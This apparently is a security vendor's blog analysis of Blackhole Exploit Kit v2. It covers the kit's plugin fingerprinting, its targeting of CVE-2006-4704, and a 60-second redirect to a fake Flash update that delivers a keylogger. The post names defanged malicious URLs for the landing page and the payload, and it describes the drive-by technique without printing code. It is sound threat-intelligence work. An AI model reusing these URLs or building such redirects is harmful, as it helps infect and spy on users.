It should come as no surprise that attackers are upgrading their Blackhole exploit kits to a new and more powerful version. An update is now available, thanks to the launch of Blackhole Exploit Kit v2 and we are starting to see adoption of this latest version.
v2 is different than v1 in many ways. Numerous enhancements have been made in order to ensure that the exploit kit remains undetected in the wild.
Some of key enhancements include:
- The URL format is dynamic in nature. It does not follow a particular pattern as the version 1.0 URLs did.
- Now executables delivered with malicious content are also protected from multiple downloads.
Heavy obfuscation of the code continues as it had in the prior version. Like the Blackhole Exploit Kit v1, v2 also continues to target the known vulnerabilities in Internet Explorer (IE), Adobe and Java. A sample of raw Blackhole exploit kit v2 can be seen from the following recent infection:
Exploit Kit URL : hxxp://anygutterking.com/links/assure_numb_engineers.php
Deobfuscation of the code allows for easier analysis. While we leverage a proprietary tool built in house for this purpose, you can also leverage tools like Malzilla and Jsunpack or attempt to manually deobfuscate the code.
The deobfuscated code shown below is divided into two parts for better understanding.
- Browser plugins/components detection
The code shown in the screen-shot is used to detect the different plug-ins and ActiveX components by scanning the DOM of the browser. By identifying the versions of installed plugins/components, the exploit kit can target known vulnerabilities.
- Attacking the vulnerabilities
In this case, a well-known vulnerability (CVE-2006-4704) in the WMI Object Broker in Microsoft Visual Studio 2005 was targeted. For more information about this vulnerability visit read our detailed blog post here. This vulnerability was also targeted by Blackhole v1 and other exploit kits such as the Incognito exploit kit.
At the end of the code, we see a redirect request to “hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe. This is a new addition to the exploit code released in this version. If the victim’s browser is patched and none of the vulnerabilities were exploited, then this redirection still provides one last chance for the attacker to compromise the victim’s machine. The variable “end_redirect” highlighted in above screen-shot is called in function setTimeout. After 60 seconds, the page is redirected to the aforementioned link, which is a fake page to update Adobe Flash. This a typical example of a drive by download attack. Once redirected to this page, the user is prompted to download an .exe file labeled “update_flash_player.exe”
Screen-shot of fake Adobe page hosted on malicious domain,
VirusTotal report shows that currently only 3/43 AV vendor flag this file as malicious. The ThreatExpert report for this same file came back as expected. It identified the file with the highest severity level and analysis indicators show the binary belonging to the ‘keylogger’ family. The file also connects to the Internet and downloads additional exe files.
Screen-shot of ThreatExpert report:
Exploits kits are becoming smarter day by day, which is keeping security vendors on their toes in an effort to combat new attacks. Fortunately, the cloud infrastructure at Zscaler allows us the flexibility to quickly add new detections as needed.
With Blackhole Exploit Kit v1, we saw an increase in malicious domains hosting exploit kits URL’s as the kit matured over the time. With the latest version being more sophisticated, we are expecting to see an even more rapid growth of Blackhole Exploit Kit v2.